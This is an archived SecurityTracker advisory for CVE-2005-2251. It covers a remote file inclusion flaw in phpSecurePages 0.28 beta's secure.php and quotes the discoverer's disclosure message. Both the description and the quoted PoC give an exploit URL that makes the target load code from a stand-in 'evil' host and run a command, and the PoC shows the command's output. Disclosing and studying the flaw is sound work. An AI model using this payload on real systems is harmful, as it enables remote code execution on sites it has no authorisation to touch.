SecurityTracker.com
    Home    |    View Topics    |    Search    |    Contact Us    |   

SecurityTracker
Archives


 


Category:   Application (Security)  >   phpSecurePages Vendors:   Kruyt, Paul
phpSecurePages Include File Bug in 'secure.php' Lets Remote Users Execute Arbitrary Commands
SecurityTracker Alert ID:  1014410
SecurityTracker URL:  http://securitytracker.com/id/1014410
CVE Reference:   CVE-2005-2251   (Links to External Site)
Updated:  Jun 16 2008
Original Entry Date:  Jul 7 2005
Impact:   Execution of arbitrary code via network, User access via network
Exploit Included:  Yes  
Version(s): 0.28 beta
Description:   Status-x reported an include file vulnerability in phpSecurePages. A remote user can execute arbitrary commands on the target system.

The 'secure.php' script does not properly validate user-supplied input in the 'cfgProgDir' parameter. A remote user can supply a specially crafted URL to cause the target system to include and execute arbitrary PHP code from a remote location. The PHP code, including operating system commands, will run with the privileges of the target web service.

A demonstration exploit URL is provided:

http://[target]/phpSecurePages/secure.php?&cfgProgDir=http://evil/cmd.txt?&cmd=id

[Editor's note: frog-m@n reported a vulnerability in the 'checklogin.php' script in October 2002, affecting version 0.27b. Status-x reports that the latest version (0.28 beta) is also vulnerable. See Alert ID 1005370.]

Impact:   A remote user can execute arbitrary PHP code and operating system commands on the target system with the privileges of the target web service.
Solution:   No solution was available at the time of this entry.
Vendor URL:  www.phpsecurepages.com/ (Links to External Site)
Cause:   Input validation error, State error
Underlying OS:  Linux (Any), UNIX (Any), Windows (Any)

Message History:   None.


 Source Message Contents

Subject:  phpSecurePages Remote File Include


Affected software: phpSecurePages X.X

Risk: High

Vendor Contacted at bugs@phpsecurepages.com but didnt replied

phpSecurePages its a secure protection for restricted directories and
it wont let anybody introduce in your site! <---- lie

Description:


We got a bad filtering in the secure.php and checklogin.php code in
the phpSecurePages Directory

Successful exploting requires that secure.php or checklogin.php are
loaded correctly by the system

PoC:

http://target/phpSecurePages/secure.php?&cfgProgDir=3Dhttp://evil/cmd.txt?&=
cmd=3Did

uid=3D32169(ooddles) gid=3D32170(ooddles)


So be careful to use this ;)


Www.Defacers.Com.Mx

Not original Advisory Available


by Status-x  - phr4xz@gmail.com
 
 


Go to the Top of This SecurityTracker Archive Page





Home   |    View Topics   |    Search   |    Contact Us

This web site uses cookies for web analytics. Learn More

Copyright 2020, SecurityGlobal.net LLC